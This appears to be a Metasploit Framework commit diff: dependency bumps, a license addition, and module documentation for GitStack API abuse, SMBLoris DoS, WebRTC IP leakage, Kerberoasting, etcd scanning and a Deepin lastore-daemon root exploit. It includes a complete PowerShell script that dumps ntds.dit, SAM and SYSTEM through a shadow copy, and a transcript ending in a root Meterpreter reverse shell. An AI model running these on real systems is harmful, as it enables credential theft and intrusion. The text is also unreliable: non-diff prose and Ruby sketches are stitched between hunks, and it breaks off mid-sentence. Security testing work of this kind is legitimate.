Merge master + workspace removal from http remote data service

commit

071a191055

26

Gemfile.lock

@@ -18,7 +18,7 @@ PATH
       metasploit-concern
       metasploit-credential
       metasploit-model
-      metasploit-payloads (= 1.3.32)
+      metasploit-payloads (= 1.3.33)
       metasploit_data_models
       metasploit_payloads-mettle (= 0.3.7)
       mqtt
@@ -59,7 +59,7 @@ PATH
       rex-text
       rex-zip
       ruby-macho
-      ruby_smb (= 0.0.18)
+      ruby_smb
       rubyntlm
       rubyzip
       sinatra
@@ -107,7 +107,7 @@ GEM
     arel (6.0.4)
     arel-helpers (2.6.1)
       activerecord (>= 3.1.0, < 6)
-    backports (3.11.1)
+    backports (3.11.3)
     bcrypt (3.1.11)
     bcrypt_pbkdf (1.0.0)
     bindata (2.4.3)
@@ -115,7 +115,7 @@ GEM
     builder (3.2.3)
     coderay (1.1.2)
     concurrent-ruby (1.0.5)
-    crass (1.0.3)
+    crass (1.0.4)
     daemons (1.2.6)
     diff-lcs (1.3)
     dnsruby (1.60.2)
@@ -129,7 +129,7 @@ GEM
       railties (>= 3.0.0)
     faker (1.8.7)
       i18n (>= 0.7)
-    faraday (0.14.0)
+    faraday (0.15.0)
       multipart-post (>= 1.2, < 3)
     filesize (0.1.1)
     fivemat (1.3.6)
@@ -161,7 +161,7 @@ GEM
       activemodel (~> 4.2.6)
       activesupport (~> 4.2.6)
       railties (~> 4.2.6)
-    metasploit-payloads (1.3.32)
+    metasploit-payloads (1.3.33)
     metasploit_data_models (3.0.0)
       activerecord (~> 4.2.6)
       activesupport (~> 4.2.6)
@@ -201,8 +201,8 @@ GEM
       ttfunk
     pg (0.20.0)
     pg_array_parser (0.0.9)
-    postgres_ext (3.0.0)
-      activerecord (>= 4.0.0)
+    postgres_ext (3.0.1)
+      activerecord (~> 4.0)
       arel (>= 4.0.1)
       pg_array_parser (~> 0.0.9)
     pry (0.11.3)
@@ -229,7 +229,7 @@ GEM
       thor (>= 0.18.1, < 2.0)
     rake (12.3.1)
     rb-readline (0.5.5)
-    recog (2.1.18)
+    recog (2.1.19)
       nokogiri
     redcarpet (3.4.0)
     rex-arch (0.1.13)
@@ -245,7 +245,7 @@ GEM
       metasm
       rex-arch
       rex-text
-    rex-exploitation (0.1.17)
+    rex-exploitation (0.1.19)
       jsobfu
       metasm
       rex-arch
@@ -268,14 +268,14 @@ GEM
       metasm
       rex-core
       rex-text
-    rex-socket (0.1.13)
+    rex-socket (0.1.14)
       rex-core
     rex-sslscan (0.1.5)
       rex-core
       rex-socket
       rex-text
     rex-struct2 (0.1.2)
-    rex-text (0.2.16)
+    rex-text (0.2.20)
     rex-zip (0.1.3)
       rex-text
     rkelly-remix (0.0.7)
@@ -304,7 +304,7 @@ GEM
     rspec-support (3.7.1)
     ruby-macho (1.1.0)
     ruby-rc4 (0.1.5)
-    ruby_smb (0.0.18)
+    ruby_smb (0.0.23)
       bindata
       rubyntlm
       windows_error
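The `postgres_ext` bump in the Gemfile.lock diff above also changes its `activerecord` constraint from `>= 4.0.0` to `~> 4.0`. The following is a minimal Ruby sketch, using RubyGems' own `Gem::Requirement` and `Gem::Version` classes, of what that change means in practice. The helper name `accepted_by` and the sample version numbers are illustrative assumptions, not part of the commit.

```ruby
require 'rubygems' # Gem::Version and Gem::Requirement ship with RubyGems

# Constraints copied from the two postgres_ext entries in the lockfile diff.
OLD_CONSTRAINT = Gem::Requirement.new('>= 4.0.0') # postgres_ext 3.0.0
NEW_CONSTRAINT = Gem::Requirement.new('~> 4.0')   # postgres_ext 3.0.1

# Hypothetical helper: reports which constraint accepts a given
# activerecord version string.
def accepted_by(version_string)
  version = Gem::Version.new(version_string)
  {
    old: OLD_CONSTRAINT.satisfied_by?(version),
    new: NEW_CONSTRAINT.satisfied_by?(version)
  }
end

# Sample versions chosen for illustration only.
%w[4.2.10 5.0.0].each do |v|
  puts "activerecord #{v}: #{accepted_by(v)}"
end
```

Under these assumptions, a 4.2.x release satisfies both constraints, while 5.0.0 satisfies only the older, open-ended one, because `~> 4.0` is shorthand for `>= 4.0` and `< 5.0`.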

48

LICENSE

@@ -603,6 +603,54 @@ License: Artistic
  DAMAGES ARISING IN ANY WAY OUT OF THE USE OF THE PACKAGE, EVEN IF
  ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
 
+License: Apache
+ Version 1.1, 2000
+ Modifications by CORE Security Technologies
+ .
+ Copyright (c) 2000 The Apache Software Foundation. All rights
+ reserved.
+ .
+ Redistribution and use in source and binary forms, with or without
+ modification, are permitted provided that the following conditions
+ are met:
+ .
+ 1. Redistributions of source code must retain the above copyright
+ notice, this list of conditions and the following disclaimer.
+ .
+ 2. Redistributions in binary form must reproduce the above copyright
+ notice, this list of conditions and the following disclaimer in
+ the documentation and/or other materials provided with the
+ distribution.
+ .
+ 3. The end-user documentation included with the redistribution,
+ if any, must include the following acknowledgment:
+ "This product includes software developed by
+ CORE Security Technologies (http://www.coresecurity.com/)."
+ Alternately, this acknowledgment may appear in the software itself,
+ if and wherever such third-party acknowledgments normally appear.
+ .
+ 4. The names "Impacket" and "CORE Security Technologies" must
+ not be used to endorse or promote products derived from this
+ software without prior written permission. For written
+ permission, please contact oss@coresecurity.com.
+ .
+ 5. Products derived from this software may not be called "Impacket",
+ nor may "Impacket" appear in their name, without prior written
+ permission of CORE Security Technologies.
+ .
+ THIS SOFTWARE IS PROVIDED ``AS IS'' AND ANY EXPRESSED OR IMPLIED
+ WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES
+ OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
+ DISCLAIMED. IN NO EVENT SHALL THE APACHE SOFTWARE FOUNDATION OR
+ ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
+ LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF
+ USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
+ ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
+ OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT
+ OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ SUCH DAMAGE.
+
 License: Apache
  Version 2.0, January 2004
  http://www.apache.org/licenses/

@@ -102,7 +102,7 @@ rex-rop_builder, 0.1.3, "New BSD"
 rex-socket, 0.1.10, "New BSD"
 rex-sslscan, 0.1.5, "New BSD"
 rex-struct2, 0.1.2, "New BSD"
-rex-text, 0.2.16, "New BSD"
+rex-text, 0.2.17, "New BSD"
 rex-zip, 0.1.3, "New BSD"
 rkelly-remix, 0.0.7, MIT
 rspec, 3.7.0, MIT
@@ -114,7 +114,7 @@ rspec-rerun, 1.1.0, MIT
 rspec-support, 3.7.1, MIT
 ruby-macho, 1.1.0, MIT
 ruby-rc4, 0.1.5, MIT
-ruby_smb, 0.0.18, "New BSD"
+ruby_smb, 0.0.23, "New BSD"
 rubyntlm, 0.6.2, MIT
 rubyzip, 1.2.1, "Simplified BSD"
 sawyer, 0.8.1, MIT

@@ -0,0 +1,139 @@
#Complete script created by Koen Riepe (koen.riepe@fox-it.com)
#New-CabinetFile originally by Iain Brighton: http://virtualengine.co.uk/2014/creating-cab-files-with-powershell/
function New-CabinetFile {
    [CmdletBinding()]
    Param(
        [Parameter(HelpMessage="Target .CAB file name.", Position=0, Mandatory=$true, ValueFromPipelineByPropertyName=$true)]
        [ValidateNotNullOrEmpty()]
        [Alias("FilePath")]
        [string] $Name,

        [Parameter(HelpMessage="File(s) to add to the .CAB.", Position=1, Mandatory=$true, ValueFromPipeline=$true)]
        [ValidateNotNullOrEmpty()]
        [Alias("FullName")]
        [string[]] $File,

        [Parameter(HelpMessage="Default intput/output path.", Position=2, ValueFromPipelineByPropertyName=$true)]
        [AllowNull()]
        [string[]] $DestinationPath,

        [Parameter(HelpMessage="Do not overwrite any existing .cab file.")]
        [Switch] $NoClobber
        )

    Begin {

        ## If $DestinationPath is blank, use the current directory by default
        if ($DestinationPath -eq $null) { $DestinationPath = (Get-Location).Path; }
        Write-Verbose "New-CabinetFile using default path '$DestinationPath'.";
        Write-Verbose "Creating target cabinet file '$(Join-Path $DestinationPath $Name)'.";

        ## Test the -NoClobber switch
        if ($NoClobber) {
            ## If file already exists then throw a terminating error
            if (Test-Path -Path (Join-Path $DestinationPath $Name)) { throw "Output file '$(Join-Path $DestinationPath $Name)' already exists."; }
        }

        ## Cab files require a directive file, see 'http://msdn.microsoft.com/en-us/library/bb417343.aspx#dir_file_syntax' for more info
        $ddf = ";*** MakeCAB Directive file`r`n";
        $ddf += ";`r`n";
        $ddf += ".OPTION EXPLICIT`r`n";
        $ddf += ".Set CabinetNameTemplate=$Name`r`n";
        $ddf += ".Set DiskDirectory1=$DestinationPath`r`n";
        $ddf += ".Set MaxDiskSize=0`r`n";
        $ddf += ".Set Cabinet=on`r`n";
        $ddf += ".Set Compress=on`r`n";
        ## Redirect the auto-generated Setup.rpt and Setup.inf files to the temp directory
        $ddf += ".Set RptFileName=$(Join-Path $ENV:TEMP "setup.rpt")`r`n";
        $ddf += ".Set InfFileName=$(Join-Path $ENV:TEMP "setup.inf")`r`n";

        ## If -Verbose, echo the directive file
        if ($PSCmdlet.MyInvocation.BoundParameters["Verbose"].IsPresent) {
            foreach ($ddfLine in $ddf -split [Environment]::NewLine) {
                Write-Verbose $ddfLine;
            }
        }
    }

    Process {

        ## Enumerate all the files add to the cabinet directive file
        foreach ($fileToAdd in $File) {

            ## Test whether the file is valid as given and is not a directory
            if (Test-Path $fileToAdd -PathType Leaf) {
                Write-Verbose """$fileToAdd""";
                $ddf += """$fileToAdd""`r`n";
            }
            ## If not, try joining the $File with the (default) $DestinationPath
            elseif (Test-Path (Join-Path $DestinationPath $fileToAdd) -PathType Leaf) {
                Write-Verbose """$(Join-Path $DestinationPath $fileToAdd)""";
                $ddf += """$(Join-Path $DestinationPath $fileToAdd)""`r`n";
            }
            else { Write-Warning "File '$fileToAdd' is an invalid file or container object and has been ignored."; }
        }
    }

    End {

        $ddfFile = Join-Path $DestinationPath "$Name.ddf";
        $ddf | Out-File $ddfFile -Encoding ascii | Out-Null;

        Write-Verbose "Launching 'MakeCab /f ""$ddfFile""'.";
        $makeCab = Invoke-Expression "MakeCab /F ""$ddfFile""";

        ## If Verbose, echo the MakeCab response/output
        if ($PSCmdlet.MyInvocation.BoundParameters["Verbose"].IsPresent) {
            ## Recreate the output as Verbose output
            foreach ($line in $makeCab -split [environment]::NewLine) {
                if ($line.Contains("ERROR:")) { throw $line; }
                else { Write-Verbose $line; }
            }
        }

        ## Delete the temporary .ddf file
        Write-Verbose "Deleting the directive file '$ddfFile'.";
        Remove-Item $ddfFile;

        ## Return the newly created .CAB FileInfo object to the pipeline
        Get-Item (Join-Path $DestinationPath $Name);
    }
}

$key = "HKLM:\SYSTEM\CurrentControlSet\Services\NTDS\Parameters"
$ntdsloc = (Get-ItemProperty -Path $key -Name "DSA Database file")."DSA Database file"
$ntdspath = $ntdsloc.split(":")[1]
$ntdsdisk = $ntdsloc.split(":")[0]

(Get-WmiObject -list win32_shadowcopy).create($ntdsdisk + ":\","ClientAccessible")

$id_shadow = "None"
$volume_shadow = "None"

if (!(Get-WmiObject win32_shadowcopy).length){
    Write-Host "Only one shadow clone"
    $id_shadow = (Get-WmiObject win32_shadowcopy).ID
    $volume_shadow = (Get-WmiObject win32_shadowcopy).DeviceObject
} Else {
    $n_shadows = (Get-WmiObject win32_shadowcopy).length-1
    $id_shadow = (Get-WmiObject win32_shadowcopy)[$n_shadows].ID
    $volume_shadow = (Get-WmiObject win32_shadowcopy)[$n_shadows].DeviceObject
}

$command = "cmd.exe /c copy "+ $volume_shadow + $ntdspath + " " + ".\ntds.dit"
iex $command

$command2 = "cmd.exe /c reg save HKLM\SYSTEM .\SYSTEM"
iex $command2

$command3 = "cmd.exe /c reg save HKLM\SAM .\SAM"
iex $command3

(Get-WmiObject -Namespace root\cimv2 -Class Win32_ShadowCopy | Where-Object {$_.DeviceObject -eq $volume_shadow}).Delete()
if (Test-Path "All.cab"){
    Remove-Item "All.cab"
}
New-CabinetFile -Name All.cab -File "SAM","SYSTEM","ntds.dit"
Remove-Item ntds.dit
Remove-Item SAM
Remove-Item SYSTEM

Binary file not shown.

@@ -0,0 +1,106 @@
## Description

GitStack through v2.3.10 contains unauthenticated REST API endpoints that can be used to retrieve information about the application and to make changes to it. This module generates requests to the vulnerable API endpoints. This module has been tested against GitStack v2.3.10.

## Vulnerable Application

The GitStack application provides REST API functionality to list application users, list application repositories, create application users, etc. Several of the application's REST API endpoints do not require authentication, which allows anyone with network-level access to the application to issue these unprotected requests.

Application user accounts created through the REST API do not have access to the admin web interface, but the accounts can be added to and removed from repositories using additional API requests.

## Actions

**LIST**

List application user accounts.

Note: The account `everyone` is a default account.

**LIST_REPOS**

List application repositories.

**CREATE**

Create a user account and add the account to all available repositories.

**CLEANUP**

Remove the specified application user account from all available repositories and delete the application account.

## Verification Steps

- [ ] Install a vulnerable GitStack application
- [ ] Create a few application user accounts
- [ ] Create a few application repositories
- [ ] `./msfconsole`
- [ ] `use auxiliary/admin/http/gitstack_rest`
- [ ] `set rhost <rhost>`
- [ ] `run`
- [ ] Verify the application user list that is returned
- [ ] `set action LIST_REPOS`
- [ ] `run`
- [ ] Verify the repository list that is returned
- [ ] `set username <username>`
- [ ] `set password <password>`
- [ ] `set action CREATE`
- [ ] `run`
- [ ] In the application, verify that the user has been created
- [ ] In the application, verify that the user has access to the repositories
- [ ] `set action CLEANUP`
- [ ] `run`
- [ ] In the application, verify that the user no longer has access to the repositories
- [ ] In the application, verify that the user has been deleted



## Scenarios

### GitStack v2.3.10 on Windows 7 SP1 x64

```
msfdev@simulator:~/git/metasploit-framework$ ./msfconsole -q -r test.rc
[*] Processing test.rc for ERB directives.
resource (test.rc)> use auxiliary/admin/http/gitstack_rest
resource (test.rc)> set rhost 172.22.222.122
rhost => 172.22.222.122
resource (test.rc)> run
[*] User List:
[+] rick
[+] morty
[+] everyone
[*] Auxiliary module execution completed
resource (test.rc)> set action LIST_REPOS
action => LIST_REPOS
resource (test.rc)> run
[*] Repo List:
[+] brainalyzer
[+] c137
[*] Auxiliary module execution completed
resource (test.rc)> set action CREATE
action => CREATE
resource (test.rc)> run
[+] SUCCESS: msf:password
[+] User msf added to brainalyzer
[+] User msf added to c137
[*] Auxiliary module execution completed
resource (test.rc)> set action CLEANUP
action => CLEANUP
resource (test.rc)> run
[+] msf removed from brainalyzer
[+] msf removed from c137
[+] msf has been deleted
[*] Auxiliary module execution completed
```

After CREATE, but before CLEANUP, use git to clone the remote repositories.

```
msfdev@simulator:~/money-bugs$ git clone http://msf:password@172.22.222.122/brainalyzer.git
Cloning into 'brainalyzer'...
remote: Counting objects: 3, done.
Unpacking objects: 100% (3/3), done.
remote: Total 3 (delta 0), reused 0 (delta 0)
msfdev@simulator:~/money-bugs$ cd brainalyzer/ && ls
szechuan_sauce.md
```
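As a rough illustration of the unauthenticated listing behaviour described under Vulnerable Application in the GitStack documentation above, the Ruby sketch below builds the listing requests and parses a JSON array response. The endpoint paths `/rest/user/` and `/rest/repository/`, the response shapes, and every helper name are assumptions made for illustration; the documentation does not state them, and this is not the module's implementation.

```ruby
require 'json'
require 'net/http'
require 'uri'

# Assumed endpoint paths (not given in the module documentation).
LIST_PATHS = { users: '/rest/user/', repos: '/rest/repository/' }.freeze

# Builds the URI for a listing request; no credentials are attached.
def list_uri(rhost, kind, rport: 80)
  URI::HTTP.build(host: rhost, port: rport, path: LIST_PATHS.fetch(kind))
end

# Parses a JSON array body into a list of names. Entries are assumed to be
# either plain strings or objects carrying a "name" key.
def parse_names(body)
  JSON.parse(body).map { |entry| entry.is_a?(Hash) ? entry['name'] : entry }
end

# Performs the GET request and returns the parsed names, or an empty list
# when the server does not answer with a 2xx status.
def fetch_names(rhost, kind)
  response = Net::HTTP.get_response(list_uri(rhost, kind))
  response.is_a?(Net::HTTPSuccess) ? parse_names(response.body) : []
end
```

Only run a request like `fetch_names('<rhost>', :users)` against a lab instance you control, as in the verification steps; the point of the sketch is simply that no session or token is involved.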

@@ -3,7 +3,7 @@
 This module exploits a vulnerability in the NetBIOS Session Service Header for SMB.
 Any Windows machine with SMB exposed, or any Linux system running Samba, is vulnerable.
 See [the SMBLoris page](http://smbloris.com/) for details on the vulnerability.
-
+
 The module opens over 64,000 connections to the target service, so please make sure
 your system ULIMIT is set appropriately to handle it. A single host running this module
 can theoretically consume up to 8 GB of memory on the target.
@@ -14,7 +14,7 @@
 
 1. Start msfconsole
 1. Do: `use auxiliary/dos/smb/smb_loris`
-1. Do: `set RHOST [IP]`
+1. Do: `set rhost [IP]`
 1. Do: `run`
 1. Target should allocate increasing amounts of memory.
 
@@ -30,14 +30,11 @@ msf auxiliary(smb_loris) >
 
 msf auxiliary(smb_loris) > run
 
-[*] 192.168.172.138:445 - Sending packet from Source Port: 1025
-[*] 192.168.172.138:445 - Sending packet from Source Port: 1026
-[*] 192.168.172.138:445 - Sending packet from Source Port: 1027
-[*] 192.168.172.138:445 - Sending packet from Source Port: 1028
-[*] 192.168.172.138:445 - Sending packet from Source Port: 1029
-[*] 192.168.172.138:445 - Sending packet from Source Port: 1030
-[*] 192.168.172.138:445 - Sending packet from Source Port: 1031
-[*] 192.168.172.138:445 - Sending packet from Source Port: 1032
-[*] 192.168.172.138:445 - Sending packet from Source Port: 1033
-....
+[*] Starting server...
+[*] 192.168.172.138:445 - 100 socket(s) open
+[*] 192.168.172.138:445 - 200 socket(s) open
+...
+[!] 192.168.172.138:445 - At open socket limit with 4000 sockets open. Try increasing you system limits.
+[*] 192.168.172.138:445 - Holding steady at 4000 socket(s) open
+...
 ```
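The SMBLoris documentation above asks the operator to make sure the local ULIMIT can accommodate the number of connections the module opens. A minimal Ruby sketch of such a pre-flight check, for Unix-like hosts, follows. The helper names and the way the threshold is passed in are assumptions for illustration, not something the module is documented to do.

```ruby
# Reads the soft and hard limits on open file descriptors for this process.
# Process.getrlimit is only implemented on Unix-like platforms.
def nofile_limits
  soft, hard = Process.getrlimit(Process::RLIMIT_NOFILE)
  { soft: soft, hard: hard }
end

# Hypothetical helper: true when the soft limit allows at least `wanted`
# descriptors (each open socket consumes one descriptor).
def enough_descriptors?(wanted, soft_limit = nofile_limits[:soft])
  soft_limit == Process::RLIM_INFINITY || soft_limit >= wanted
end

limits = nofile_limits
puts "soft limit: #{limits[:soft]}, hard limit: #{limits[:hard]}"
puts 'soft limit is below 64,000 descriptors' unless enough_descriptors?(64_000)
```

With a soft limit of 4000, as in the "At open socket limit with 4000 sockets open" message in the sample output, the check would report that the limit is too low for the 64,000 connections mentioned in the text.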

@@ -0,0 +1,47 @@
## Vulnerable Application

This module retrieves the IP addresses of a browser's network interfaces using WebRTC. When a browser with WebRTC enabled visits the module's HTTP server, it can disclose a private IP address in a STUN request.

Related links: https://datarift.blogspot.in/p/private-ip-leakage-using-webrtc.html

## Verification

1. Start msfconsole
2. `use auxiliary/gather/browser_lanipleak`
3. Set SRVHOST
4. Set SRVPORT
5. `run` (Server started)
6. Visit the server URL in any browser that has WebRTC enabled

## Scenarios

```
msf auxiliary(gather/browser_lanipleak) > show options

Module options (auxiliary/gather/browser_lanipleak):

Name     Current Setting  Required  Description
----     ---------------  --------  -----------
SRVHOST  192.168.1.104    yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT  8080             yes       The local port to listen on.
SSL      false            no        Negotiate SSL for incoming connections
SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
URIPATH                   no        The URI to use for this exploit (default is random)


Auxiliary action:

Name       Description
----       -----------
WebServer


msf auxiliary(gather/browser_lanipleak) > run
[*] Auxiliary module running as background job 0.
msf auxiliary(gather/browser_lanipleak) >
[*] Using URL: http://192.168.1.104:8080/mIV1EgzDiEEIMT
[*] Server started.

[*] 192.168.1.104: Sending response (2523 bytes)
[+] 192.168.1.104: Found IP address: X.X.X.X
```
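To make the WebRTC disclosure described in the `browser_lanipleak` documentation above more concrete, here is a hedged Ruby sketch that pulls the address out of an ICE candidate line and checks whether it falls in a private IPv4 range. The candidate string, the assumed field order (foundation, component, transport, priority, address, port, `typ`, type), and the helper names are illustrative assumptions; the module itself gathers addresses in the browser, and this sketch only shows how such a value could be classified afterwards.

```ruby
require 'ipaddr'

# RFC 1918 private IPv4 ranges.
PRIVATE_RANGES = %w[10.0.0.0/8 172.16.0.0/12 192.168.0.0/16]
                 .map { |cidr| IPAddr.new(cidr) }.freeze

# Extracts the connection address (fifth field) from an ICE candidate line,
# tolerating an optional "a=" SDP prefix.
def candidate_address(line)
  fields = line.strip.sub(/\Aa=/, '').sub(/\Acandidate:/, '').split
  fields[4]
end

# True when the value parses as an IPv4 address inside a private range.
# Non-IP values such as hostnames are treated as not private.
def private_ipv4?(address)
  ip = IPAddr.new(address)
  ip.ipv4? && PRIVATE_RANGES.any? { |range| range.include?(ip) }
rescue IPAddr::InvalidAddressError
  false
end

# Hypothetical candidate line, for illustration only.
sample = 'candidate:842163049 1 udp 1677729535 192.168.1.104 46154 typ host'
address = candidate_address(sample)
puts "#{address} private? #{private_ipv4?(address)}"
```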

@@ -0,0 +1,31 @@
## Description

This module will try to find Service Principal Names (SPNs) that are associated with normal user accounts on the specified domain and then submit requests to retrieve Ticket Granting Service (TGS) tickets for those accounts, which may be partially encrypted with the SPN account's NTLM hash. After retrieving the TGS tickets, offline brute-force attacks can be performed to recover the passwords of the SPN accounts.

## Verification Steps

To avoid library and version conflicts, it is useful to work inside a pipenv virtual environment.

* `pipenv --two && pipenv shell`
* Follow the [impacket installation steps](https://github.com/CoreSecurity/impacket#installing) to install the required libraries.
* Have credentials for a domain user account
* `./msfconsole -q -x 'use auxiliary/gather/get_user_spns; set rhosts <dc-ip> ; set smbuser <user> ; set smbpass <password> ; set smbdomain <domain> ; run'`
* Get Hashes

## Scenarios

```
$ ./msfconsole -q -x 'use auxiliary/gather/get_user_spns; set rhosts <dc-ip> ; set smbuser <user> ; set smbpass <password> ; set smbdomain <domain> ; run'
rhosts => <dc-ip>
smbuser => <user>
smbpass => <password>
smbdomain => <domain>
[*] Running for <domain>...
[*] Total of records returned <num>
[+] ServicePrincipalName Name MemberOf PasswordLastSet LastLogon
[+] ------------------------------------------------ ---------- -------------------------------------------------------------------------------- ------------------- -------------------
[+] SPN... User... List... DateTime... Time...
[+] $krb5tgs$23$*user$realm$test/spn*$<data>
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```
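The sample output in the `get_user_spns` documentation above prints each ticket as a `$krb5tgs$23$*user$realm$test/spn*$<data>` line. The Ruby sketch below splits such a line into its visible fields, which can be handy when sorting results before handing them to an offline cracking tool. The field names, the `TgsHash` struct, and the regular expression are assumptions derived only from the layout of that sample line, not from a formal specification.

```ruby
# Fields as they appear, left to right, in the sample hash line.
TgsHash = Struct.new(:etype, :user, :realm, :spn, :data)

# Assumed layout: $krb5tgs$<etype>$*<user>$<realm>$<spn>*$<data>
TGS_PATTERN = /\A\$krb5tgs\$(\d+)\$\*([^$*]+)\$([^$*]+)\$([^*]+)\*\$(.+)\z/

# Returns a TgsHash for a matching line, or nil when the line does not
# follow the assumed layout.
def parse_tgs_hash(line)
  match = TGS_PATTERN.match(line.strip)
  return nil unless match

  TgsHash.new(match[1].to_i, match[2], match[3], match[4], match[5])
end

# Placeholder data stands in for the ticket bytes.
parsed = parse_tgs_hash('$krb5tgs$23$*user$realm$test/spn*$0123abcd')
puts "#{parsed.user}@#{parsed.realm} (#{parsed.spn}), etype #{parsed.etype}"
```

Returning `nil` for non-matching input keeps the helper safe to map over mixed console output, where most lines are status messages rather than hashes.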

@@ -75,10 +75,6 @@ msf5 auxiliary(scanner/etcd/open_key_scanner) > set RHOSTS 127.0.0.1
 RHOSTS => 127.0.0.1
 msf5 auxiliary(scanner/etcd/open_key_scanner) > run
 
-[*] Scanned 1 of 1 hosts (100% complete)
-[*] Auxiliary module execution completed
-msf5 auxiliary(scanner/etcd/open_key_scanner) > run
-
 [+] 127.0.0.1:2379
 Version: {"etcdserver":"3.1.3","etcdcluster":"3.1.0"}
 Data: {

@@ -0,0 +1,38 @@
## Vulnerable Application

etcd is a distributed, reliable key-value store. It exposes an API from which you can obtain the version of etcd and related components.

### Docker

1. `docker run -p 2379:2379 miguelgrinberg/easy-etcd`

## Verification Steps

1. Install the application
2. Start msfconsole
3. Do: ```use auxiliary/scanner/etcd/version```
4. Do: ```set rhosts [IPs]```
5. Do: ```run```
6. You should get a JSON response for the version, and the service should be identified in `services`.

## Scenarios

### etcd in Docker

```
msf5 > use auxiliary/scanner/etcd/version
msf5 auxiliary(scanner/etcd/version) > set RHOSTS localhost
RHOSTS => localhost
msf5 auxiliary(scanner/etcd/version) > run

[+] 127.0.0.1:2379 : {"etcdserver"=>"3.1.3", "etcdcluster"=>"3.1.0"}
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/etcd/version) > services
Services
========

host       port  proto  name  state  info
----       ----  -----  ----  -----  ----
127.0.0.1  2379  tcp    etcd  open   {"etcdserver"=>"3.1.3", "etcdcluster"=>"3.1.0"}
```
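For readers who want to see the version query from the etcd documentation above outside of msfconsole, the following Ruby sketch requests the version document and extracts the two fields shown in the sample output. The `/version` path, the default port argument, and the helper names are assumptions for illustration; the JSON keys are taken from the sample output.

```ruby
require 'json'
require 'net/http'
require 'uri'

# Builds the URI for the version document. The '/version' path is an
# assumption; port 2379 matches the Docker example.
def version_uri(host, port = 2379)
  URI::HTTP.build(host: host, port: port, path: '/version')
end

# Extracts the server and cluster versions from the JSON body.
def parse_version(body)
  info = JSON.parse(body)
  { server: info['etcdserver'], cluster: info['etcdcluster'] }
end

# Fetches and parses the version document from a running etcd instance.
def fetch_version(host, port = 2379)
  parse_version(Net::HTTP.get(version_uri(host, port)))
end

# Parsing the body shown in the sample output, without touching the network.
sample = '{"etcdserver":"3.1.3","etcdcluster":"3.1.0"}'
puts parse_version(sample)[:server]
```

Calling `fetch_version('127.0.0.1')` against the Docker container from the setup step should return the same two fields, assuming the container exposes the endpoint as expected.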

@@ -0,0 +1,101 @@
## Description

This module attempts to gain root privileges on [Deepin Linux](https://www.deepin.org/en/) systems
by using `lastore-daemon` to install a package. It may cause audio and/or graphical signals confirming
the installation of the payload package.


## Vulnerable Application

The `lastore-daemon` D-Bus configuration on Deepin Linux 15.5 permits any
user in the `sudo` group to install arbitrary system packages without
providing a password, resulting in code execution as root. By default,
the first user created on the system is a member of the `sudo` group.

The D-Bus configuration in `/usr/share/dbus-1/system.d/com.deepin.lastore.conf`
permits users of the `sudo` group to execute arbitrary methods on the
`com.deepin.lastore` interface, as shown below:

```xml
<!-- Only root can own the service -->
<policy user="root">
  <allow own="com.deepin.lastore"/>
  <allow send_destination="com.deepin.lastore"/>
</policy>

<!-- Allow sudo group to invoke methods on the interfaces -->
<policy group="sudo">
  <allow own="com.deepin.lastore"/>
  <allow send_destination="com.deepin.lastore"/>
</policy>
```

This module has been tested successfully with lastore-daemon version
0.9.53-1 on Deepin Linux 15.5 (x64).

Deepin Linux is available here:

* https://www.deepin.org/en/mirrors/releases/

`lastore-daemon` source repository is available here:

* https://cr.deepin.io/#/admin/projects/lastore/lastore-daemon
* https://github.com/linuxdeepin/lastore-daemon/


## Verification Steps

1. Start `msfconsole`
2. Get a session
3. `use exploit/linux/local/lastore_daemon_dbus_priv_esc`
4. `set SESSION [SESSION]`
5. `check`
6. `run`
7. You should get a new *root* session


## Options

**SESSION**

Which session to use, which can be viewed with `sessions`

**WritableDir**

A writable directory file system path. (default: `/tmp`)


## Scenarios

```
msf > use exploit/linux/local/lastore_daemon_dbus_priv_esc
msf exploit(linux/local/lastore_daemon_dbus_priv_esc) > set session 1
session => 1
msf exploit(linux/local/lastore_daemon_dbus_priv_esc) > run

[!] SESSION may not be compatible with this module.
[*] Started reverse TCP handler on 172.16.191.188:4444
[*] Building package...
[*] Writing '/tmp/.NNhJWRPZdd/DEBIAN/control' (98 bytes) ...
[*] Writing '/tmp/.NNhJWRPZdd/DEBIAN/postinst' (28 bytes) ...
[*] Uploading payload...
[*] Writing '/tmp/.1sZZ46ozIH' (207 bytes) ...
[*] Installing package...
[*] Sending stage (857352 bytes) to 172.16.191.200
[*] Meterpreter session 2 opened (172.16.191.188:4444 -> 172.16.191.200:51464) at 2018-03-24 18:45:29 -0400
[+] Deleted /tmp/.NNhJWRPZdd/DEBIAN/control
[+] Deleted /tmp/.NNhJWRPZdd/DEBIAN/postinst
[+] Deleted /tmp/.1sZZ46ozIH
[+] Deleted /tmp/.NNhJWRPZdd/DEBIAN
[*] Removing package...

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer     : 172.16.191.200
OS           : Deepin 15.5 (Linux 4.9.0-deepin13-amd64)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
```

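The D-Bus policy quoted in the `lastore-daemon` documentation above is what makes the privilege escalation possible, so it can be useful to audit a configuration for the same pattern. The Ruby sketch below lists which users or groups are allowed to send messages to a given destination. It relies on a simple regular expression rather than a real XML parser, and the helper name and constants are hypothetical; treat it as an audit aid under those assumptions, not as the module's check logic.

```ruby
# Matches <policy user="..."> or <policy group="..."> blocks and captures
# the principal kind, its name, and the block body.
POLICY_BLOCK = %r{<policy\s+(user|group)="([^"]+)"\s*>(.*?)</policy>}m

# Returns [kind, name] pairs for every policy block that allows sending
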